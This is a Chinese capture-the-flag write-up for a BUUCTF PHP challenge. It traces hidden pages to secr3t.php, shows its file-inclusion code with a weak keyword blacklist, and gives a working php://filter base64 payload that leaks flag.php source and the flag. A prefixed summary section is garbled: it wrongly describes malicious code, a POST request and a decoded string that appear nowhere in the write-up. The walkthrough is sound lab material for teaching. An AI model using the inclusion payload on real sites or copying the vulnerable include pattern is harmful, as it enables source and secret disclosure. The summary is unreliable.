小编点评

**目标页面 URL：** `http://3bfaebad-fdfa-4226-ae0a-551f0228becb.node4.buuoj.cn:81/Archive_room.php` **访问路径：** * `./Archive_room.php` **获取的资源：** * `flag.php` **获取方式：** * 通过构造的 URL 访问 `Archive_room.php` 页面。 **恶意代码分析：** 当访问 `Archive_room.php` 页面时，浏览器会发送一个 POST 请求并包含一个 `file` 参数，该参数包含一个 Base64 解密后的内容。恶意代码在处理该请求时会将内容解码并执行。 **恶意代码解析：** 恶意代码将解码得到以下字符串： ``` I'm just here to stay. I will never go home. ``` **恶意代码功能：** 当恶意代码成功执行时，它将打印该字符串到页面，并在浏览器中显示。

正文

打开靶机对应的url

右键查看网页源代码，查看到一个访问路径 /Archive_room.php

构造url访问一下

http://3bfaebad-fdfa-4226-ae0a-551f0228becb.node4.buuoj.cn:81/Archive_room.php

右键再次查看源代码，有一个访问路径./action.php"

http://3bfaebad-fdfa-4226-ae0a-551f0228becb.node4.buuoj.cn:81/action.php

访问看看

这里是题眼，提示会去仔细看看，那么我们用burpsuite抓包看看

发现action 返回的包是个302，里面其实还有个访问路径

HTTP/1.1 302 Found
Server: openresty
Date: Sun, 11 Dec 2022 03:57:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: end.php
X-Powered-By: PHP/7.3.11
Content-Length: 63

<!DOCTYPE html>

<html>
<!--
   secr3t.php        
-->
</html>

同样构造url访问看看（secr3t.php）

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

先访问一下flag.php试一下再说

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈！你找到我了！可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            我就在这里        </p>
    </body>

</html>

既然说就在这里，那么尝试一下php伪协议，看能不能拿到源码看看

http://3bfaebad-fdfa-4226-ae0a-551f0228becb.node4.buuoj.cn:81/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

返回

 <html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7Nzk2YmNlYzEtMDliNS00NWFmLThmYmQtNjlmZTE2YjRkMjA5fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo= 

base64 解密一下，Boom，得到flag

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈！你找到我了！可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{796bcec1-09b5-45af-8fbd-69fe16b4d209}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>